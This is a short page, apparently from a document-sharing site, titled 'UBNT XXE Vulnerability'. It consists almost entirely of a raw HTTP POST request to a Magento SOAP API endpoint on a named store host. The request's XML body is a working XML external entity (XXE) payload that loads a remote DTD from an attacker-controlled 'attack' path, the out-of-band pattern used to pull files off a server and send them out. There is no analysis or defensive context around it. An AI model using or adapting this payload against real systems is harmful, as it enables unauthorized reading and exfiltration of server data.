UBNT XXE Vulnerability

You might also like

Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

POST /index.php/api/soap/index/ HTTP/1.

1
Content-Type: text/xml; charset=utf-8
SOAPAction: "urn:Mage_Api_Model_Server_HandlerAction"
Host: store.ubnt.com
Content-Length: 583
Expect: 100-continue
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://www.blsecurity.com/attack/pub2
.xml"> %remote; %param1; ]>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
<s:Body s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi=
"http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XM
LSchema">
<q1:login xmlns:q1="urn:Magento">
<username xsi:type="xsd:string">aaaaa</username>
<apiKey xsi:type="xsd:string">aaaaa</apiKey>
</q1:login>
</s:Body>
</s:Envelope>

You might also like